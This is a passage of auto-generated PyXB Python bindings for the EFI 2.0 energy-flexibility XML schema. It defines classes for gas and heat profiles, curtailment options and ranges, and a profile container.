    GasProfile entries).  No child elements; two required attributes:
    duration (xs:duration) and flowRate (xs:double).  Generated code --
    do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 177, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_3_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 178, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 178, 5)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
    __flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_3_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double, required=True)
    __flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 179, 5)
    __flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 179, 5)
    flowRate = property(__flowRate.value, __flowRate.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __flowRate.name() : __flowRate
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_3 = CTD_ANON_3
# Complex type {http://www.flexiblepower.org/efi-2}GasProbabilityProfile with content type ELEMENT_ONLY
class GasProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}GasProbabilityProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 184.  Content model: repeated
    {efi-2}flowRateElement children; no attributes.  Generated code --
    do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'GasProbabilityProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 184, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}flowRateElement uses Python identifier flowRateElement
    __flowRateElement = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flowRateElement'), 'flowRateElement', '__httpwww_flexiblepower_orgefi_2_GasProbabilityProfile_httpwww_flexiblepower_orgefi_2flowRateElement', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 186, 3), )
    flowRateElement = property(__flowRateElement.value, __flowRateElement.set, None, None)
    _ElementMap.update({
        __flowRateElement.name() : __flowRateElement
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.GasProbabilityProfile = GasProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'GasProbabilityProfile', GasProbabilityProfile)
# Complex type {http://www.flexiblepower.org/efi-2}HeatProfile with content type ELEMENT_ONLY
class HeatProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}HeatProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 189.  Content model: repeated
    {efi-2}element children; no attributes.  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'HeatProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 189, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_HeatProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 191, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.HeatProfile = HeatProfile
Namespace.addCategoryObject('typeBinding', 'HeatProfile', HeatProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 192 (the element type of
    HeatProfile entries).  No child elements.  Attributes: duration
    (xs:duration, required); temperature, flowRate and thermalPower
    (xs:double, declared without required=True).  Generated code -- do
    not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 192, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 193, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 193, 5)
    duration = property(__duration.value, __duration.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
    __temperature = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2temperature', pyxb.binding.datatypes.double)
    __temperature._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 194, 5)
    __temperature._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 194, 5)
    temperature = property(__temperature.value, __temperature.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
    __flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double)
    __flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 195, 5)
    __flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 195, 5)
    flowRate = property(__flowRate.value, __flowRate.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
    __thermalPower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2thermalPower', pyxb.binding.datatypes.double)
    __thermalPower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 196, 5)
    __thermalPower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 196, 5)
    thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __duration.name() : __duration,
        __temperature.name() : __temperature,
        __flowRate.name() : __flowRate,
        __thermalPower.name() : __thermalPower
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_4 = CTD_ANON_4
# Complex type {http://www.flexiblepower.org/efi-2}HeatProbabilityProfile with content type ELEMENT_ONLY
class HeatProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}HeatProbabilityProfile with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 201.  Content model: repeated
    {efi-2}element children; no attributes.  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'HeatProbabilityProfile')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 201, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
    __element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_HeatProbabilityProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3), )
    element = property(__element.value, __element.set, None, None)
    _ElementMap.update({
        __element.name() : __element
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.HeatProbabilityProfile = HeatProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'HeatProbabilityProfile', HeatProbabilityProfile)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type ELEMENT_ONLY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 204 (the element type of
    HeatProbabilityProfile entries).  Child elements: temperature,
    flowRate and thermalPower (each declared non-plural); one required
    attribute: duration (xs:duration).  Generated code -- do not edit
    by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 204, 4)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
    __temperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2temperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6), )
    temperature = property(__temperature.value, __temperature.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
    __flowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2flowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6), )
    flowRate = property(__flowRate.value, __flowRate.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
    __thermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2thermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6), )
    thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
    __duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
    __duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 210, 5)
    __duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 210, 5)
    duration = property(__duration.value, __duration.set, None, None)
    _ElementMap.update({
        __temperature.name() : __temperature,
        __flowRate.name() : __flowRate,
        __thermalPower.name() : __thermalPower
    })
    _AttributeMap.update({
        __duration.name() : __duration
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_5 = CTD_ANON_5
# Complex type {http://www.flexiblepower.org/efi-2}SupportedCommodities with content type ELEMENT_ONLY
class SupportedCommodities (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}SupportedCommodities with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 226.  Content model: repeated
    {efi-2}commodityType children; no attributes.  Generated code -- do
    not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SupportedCommodities')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 226, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}commodityType uses Python identifier commodityType
    __commodityType = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'commodityType'), 'commodityType', '__httpwww_flexiblepower_orgefi_2_SupportedCommodities_httpwww_flexiblepower_orgefi_2commodityType', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3), )
    commodityType = property(__commodityType.value, __commodityType.set, None, None)
    _ElementMap.update({
        __commodityType.name() : __commodityType
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.SupportedCommodities = SupportedCommodities
Namespace.addCategoryObject('typeBinding', 'SupportedCommodities', SupportedCommodities)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOptions with content type ELEMENT_ONLY
class CurtailmentOptions (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOptions with content type ELEMENT_ONLY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 231.  Content model: repeated
    {efi-2}curtailmentOption children; no attributes.  Generated code --
    do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentOptions')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 231, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}curtailmentOption uses Python identifier curtailmentOption
    __curtailmentOption = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption'), 'curtailmentOption', '__httpwww_flexiblepower_orgefi_2_CurtailmentOptions_httpwww_flexiblepower_orgefi_2curtailmentOption', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3), )
    curtailmentOption = property(__curtailmentOption.value, __curtailmentOption.set, None, None)
    _ElementMap.update({
        __curtailmentOption.name() : __curtailmentOption
    })
    _AttributeMap.update({
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.CurtailmentOptions = CurtailmentOptions
Namespace.addCategoryObject('typeBinding', 'CurtailmentOptions', CurtailmentOptions)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentRange with content type EMPTY
class CurtailmentRange (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}CurtailmentRange with content type EMPTY

    PyXB-generated binding for the schema type at
    InflexibleControllerEfi20.xsd line 243.  No child elements; two
    required attributes: lowerBound and upperBound (xs:double).
    Generated code -- do not edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentRange')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 243, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
    __lowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_CurtailmentRange_httpwww_flexiblepower_orgefi_2lowerBound', pyxb.binding.datatypes.double, required=True)
    __lowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 244, 2)
    __lowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 244, 2)
    lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
    __upperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_CurtailmentRange_httpwww_flexiblepower_orgefi_2upperBound', pyxb.binding.datatypes.double, required=True)
    __upperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 245, 2)
    __upperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 245, 2)
    upperBound = property(__upperBound.value, __upperBound.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __lowerBound.name() : __lowerBound,
        __upperBound.name() : __upperBound
    })

# Register the binding in the module and namespace lookup tables.
_module_typeBindings.CurtailmentRange = CurtailmentRange
Namespace.addCategoryObject('typeBinding', 'CurtailmentRange', CurtailmentRange)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_6 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 259.  No child elements; one
    required attribute: power (xs:double).  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 259, 7)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}power uses Python identifier power
    __power = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'power'), 'power', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_6_httpwww_flexiblepower_orgefi_2power', pyxb.binding.datatypes.double, required=True)
    __power._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 260, 8)
    __power._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 260, 8)
    power = property(__power.value, __power.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __power.name() : __power
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_6 = CTD_ANON_6
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_7 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY

    PyXB-generated binding for the anonymous type at
    InflexibleControllerEfi20.xsd line 264.  No child elements; one
    required attribute: flowRate (xs:double).  Generated code -- do not
    edit by hand.
    """
    _TypeDefinition = None  # no simple-type content; derived from xs:anyType
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = None  # anonymous type: no global schema name
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 264, 7)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
    __flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_7_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double, required=True)
    __flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 265, 8)
    __flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 265, 8)
    flowRate = property(__flowRate.value, __flowRate.set, None, None)
    _ElementMap.update({
    })
    _AttributeMap.update({
        __flowRate.name() : __flowRate
    })

# Anonymous type: registered in the module map only (no namespace category entry).
_module_typeBindings.CTD_ANON_7 = CTD_ANON_7
# Complex type [anonymous] with content type EMPTY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
class CTD_ANON_8 (pyxb.binding.basis.complexTypeDefinition):
    """Complex type [anonymous] with content type EMPTY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    # Anonymous type: no namespace-qualified name of its own.
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 269, 7)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # All three attributes below are optional (no required=True) double-valued XSD attributes.
    # Attribute {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
    __temperature = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2temperature', pyxb.binding.datatypes.double)
    __temperature._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 270, 8)
    __temperature._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 270, 8)
    temperature = property(__temperature.value, __temperature.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
    __flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double)
    __flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 271, 8)
    __flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 271, 8)
    flowRate = property(__flowRate.value, __flowRate.set, None, None)
    # Attribute {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
    __thermalPower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2thermalPower', pyxb.binding.datatypes.double)
    __thermalPower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 272, 8)
    __thermalPower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 272, 8)
    thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
    # Register the declarations in the maps PyXB consults during (de)serialization.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __temperature.name() : __temperature,
        __flowRate.name() : __flowRate,
        __thermalPower.name() : __thermalPower
    })
# Expose the anonymous binding at module scope.
_module_typeBindings.CTD_ANON_8 = CTD_ANON_8
# Complex type {http://www.flexiblepower.org/efi-2}ProfileContainer with content type ELEMENT_ONLY
# NOTE: PyXB auto-generated binding -- edit the XSD and regenerate rather than hand-editing.
# Container offering one child per commodity profile variant (electricity/gas/heat,
# plain or probability), per the element declarations below.
class ProfileContainer (pyxb.binding.basis.complexTypeDefinition):
    """Complex type {http://www.flexiblepower.org/efi-2}ProfileContainer with content type ELEMENT_ONLY"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProfileContainer')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 291, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.flexiblepower.org/efi-2}electricityProfile uses Python identifier electricityProfile
    # Fourth positional argument False => declared as a non-plural (single-valued) element.
    __electricityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile'), 'electricityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2electricityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4), )
    electricityProfile = property(__electricityProfile.value, __electricityProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}electricityProbabilityProfile uses Python identifier electricityProbabilityProfile
    __electricityProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile'), 'electricityProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2electricityProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4), )
    electricityProbabilityProfile = property(__electricityProbabilityProfile.value, __electricityProbabilityProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasProfile uses Python identifier gasProfile
    __gasProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasProfile'), 'gasProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2gasProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4), )
    gasProfile = property(__gasProfile.value, __gasProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}gasProbabilityProfile uses Python identifier gasProbabilityProfile
    __gasProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile'), 'gasProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2gasProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4), )
    gasProbabilityProfile = property(__gasProbabilityProfile.value, __gasProbabilityProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatProfile uses Python identifier heatProfile
    __heatProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatProfile'), 'heatProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2heatProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4), )
    heatProfile = property(__heatProfile.value, __heatProfile.set, None, None)
    # Element {http://www.flexiblepower.org/efi-2}heatProbabilityProfile uses Python identifier heatProbabilityProfile
